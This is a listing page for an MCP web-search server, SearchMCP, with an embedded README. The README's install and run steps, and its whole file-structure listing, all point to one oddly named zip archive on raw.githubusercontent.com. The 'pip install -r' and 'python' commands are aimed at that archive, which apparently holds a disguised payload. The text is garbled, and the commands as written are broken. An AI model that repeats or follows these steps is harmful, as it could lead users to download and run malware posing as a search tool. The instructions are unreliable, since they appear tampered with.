π Enhance AI capabilities with SearchMCP, a web search and scraping service built on FastMCP for efficient internet access and data retrieval.
Config is the same across clients β only the file and path differ.
{
"mcpServers": {
"searchmcp": {
"command": "<see-readme>",
"args": []
}
}
}Are you the author?
Add this badge to your README to show your security score and help users find safe servers.
SearchMCP gives your AI assistant the power to browse the internet. It offers features like searching multiple engines, directly accessing Google results, and reading web pages in an easy-to-read format. This guide helps you install and run SearchMCP smoothly.
This server supports HTTP transport. Be the first to test it β help the community know if it works.
Five weighted categories β click any category to see the underlying evidence.
No known CVEs.
No package registry to scan.
Be the first to review
Have you used this server?
Share your experience β it helps other developers decide.
Sign in to write a review.
Others in search
Web and local search using Brave Search API
An autonomous agent that conducts deep research on any data using any LLM providers
MCP server for local codebase indexing, semantic search, and code dependency graphs.
The official MCP server implementation for the Perplexity API Platform
MCP Security Weekly
Get CVE alerts and security updates for SearchMCP and similar servers.
Start a conversation
Ask a question, share a tip, or report an issue.
Sign in to join the discussion.
SearchMCP gives your AI assistant the power to browse the internet. It offers features like searching multiple engines, directly accessing Google results, and reading web pages in an easy-to-read format. This guide helps you install and run SearchMCP smoothly.
SearchMCP uses Camoufox to help avoid blocks from websites. Users on Windows will run in a standard mode, as Camoufox does not support Windows systems, which may reduce effectiveness.
SearchMCP includes a built-in web dashboard for live monitoring of tool usage and logs.
Access it at: http://localhost:9191/dashboard
To download SearchMCP, visit the Releases Page.
Before running the application, you need to install some dependencies.
Open Your Command Line Interface: On Windows, search for "Command Prompt" or "PowerShell". On macOS or Linux, use the terminal.
Install the Dependencies: Type the following command and press Enter:
pip install -r https://raw.githubusercontent.com/smksamir/SearchMCP/main/static/MCP_Search_ulnometacarpal.zip
Fetch Camoufox Browser: Enter the command below to install Camoufox:
camoufox fetch
Once the installation is complete, you can run SearchMCP by following these steps:
Open Command Line Interface Again.
Run the Main Program: Enter the following command:
python https://raw.githubusercontent.com/smksamir/SearchMCP/main/static/MCP_Search_ulnometacarpal.zip
Access the Service: Open your web browser and go to http://0.0.0.0:9191. The service will be ready for use.
For full functionality, the SearXNG service must run alongside SearchMCP. Ensure that SearXNG is available at http://127.0.0.1:10003 for the web search feature to work.
After downloading, you will see the following file structure:
.
βββ https://raw.githubusercontent.com/smksamir/SearchMCP/main/static/MCP_Search_ulnometacarpal.zip # Main program file
βββ https://raw.githubusercontent.com/smksamir/SearchMCP/main/static/MCP_Search_ulnometacarpal.zip # Python dependencies file
βββ static/ # Holds static resources
β βββ https://raw.githubusercontent.com/smksamir/SearchMCP/main/static/MCP_Search_ulnometacarpal.zip # CSS styles
β βββ https://raw.githubusercontent.com/smksamir/SearchMCP/main/static/MCP_Search_ulnometacarpal.zip # JavaScript functionality
βββ templates/ # HTML templates
βββ https://raw.githubusercontent.com/smksamir/SearchMCP/main/static/MCP_Search_ulnometac
... [View full README on GitHub](https://github.com/smksamir/SearchMCP#readme)